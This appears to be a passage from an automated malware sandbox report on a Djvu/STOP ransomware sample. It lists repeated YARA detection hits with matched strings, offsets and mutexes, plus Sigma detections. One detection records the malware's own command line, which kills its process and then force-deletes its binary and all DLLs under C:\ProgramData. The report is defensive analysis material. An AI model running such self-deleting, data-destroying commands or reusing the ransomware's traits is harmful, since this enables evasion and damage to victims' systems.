2.0.Q5W0I0pzFI.exe.400000.7.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.7.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.7.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.Q5W0I0pzFI.exe.21d15a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
0.2.Q5W0I0pzFI.exe.21d15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.Q5W0I0pzFI.exe.21d15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.0.Q5W0I0pzFI.exe.400000.10.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.10.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.10.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.8.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.Q5W0I0pzFI.exe.22f15a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
10.2.Q5W0I0pzFI.exe.22f15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.Q5W0I0pzFI.exe.22f15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.9.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.9.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.9.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
17.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.7.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.7.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.7.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.8.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.8.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.6.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.6.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.Q5W0I0pzFI.exe.21515a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
6.2.Q5W0I0pzFI.exe.21515a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.Q5W0I0pzFI.exe.21515a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.Q5W0I0pzFI.exe.400000.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.8.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.8.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
8.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Click to see the 283 entries

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" & del C:\ProgramData\*.dll & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" & del C:\ProgramData\*.dll & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" , ParentImage: C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe, ParentProcessId: 2304, ParentProcessName: build2.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe" & del C:\ProgramData\*.dll & exit, ProcessId: 7136, ProcessName: cmd.exe

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke (rule): Data: Image: C:\Users\user\Desktop\Q5W0I0pzFI.exe, QueryName: api.2ip.ua

Source: Registry Key set

